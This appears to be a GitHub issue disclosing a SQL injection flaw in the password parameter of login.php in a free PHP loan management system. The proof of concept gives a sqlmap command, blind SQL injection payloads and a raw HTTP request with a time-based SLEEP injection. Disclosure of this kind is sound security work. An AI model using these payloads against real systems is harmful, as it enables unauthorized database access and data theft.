Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0 login.php - SQL injection vulnerability #10

Open
xuanluansec opened this issue Mar 31, 2024 · 0 comments
Open

Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0 login.php - SQL injection vulnerability #10

xuanluansec opened this issue Mar 31, 2024 · 0 comments

Comments

@xuanluansec
Copy link

Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0 login.php - SQL injection vulnerability

  • Author: charonwang

Vendor Homepage

Software Link

Overvie

  • charonwang has discovered that Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0 is affected by serious security vulnerabilities due to insufficient protection of the "password" parameter in the "login.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.

Vulnerability Details

  • Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0
  • Vulnerable File: login.php
  • Parameter Names: password
  • Attack Type: Remote

Description

  • charonwang has discovered that Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0 is affected by serious security vulnerabilities due to insufficient protection of the "password" parameter in the "login.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.

Proof of Concept (PoC) :

  • sqlmap -u "http://www.lms.com:8105/login.php" --dbms=mysql -v 3 -p 'password' --data="username=admin&password=admin111&login=" --method='POST'
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: username=admin&password=admin111' OR NOT 5946=5946#&login=
    Vector: OR NOT [INFERENCE]#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin&password=admin111' AND (SELECT 2451 FROM (SELECT(SLEEP(5)))FOOe)-- lCKh&login=
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
1

Burp Suite (POC):

POST /login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Connection: close
Cookie: PHPSESSID=mnhh06uo91qagrf4fhvggc6lo4
Upgrade-Insecure-Requests: 1

username=admin&password=admin111' AND (SELECT 2451 FROM (SELECT(SLEEP(10)))FOOe)-- lCKh&login=
2
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@xuanluansec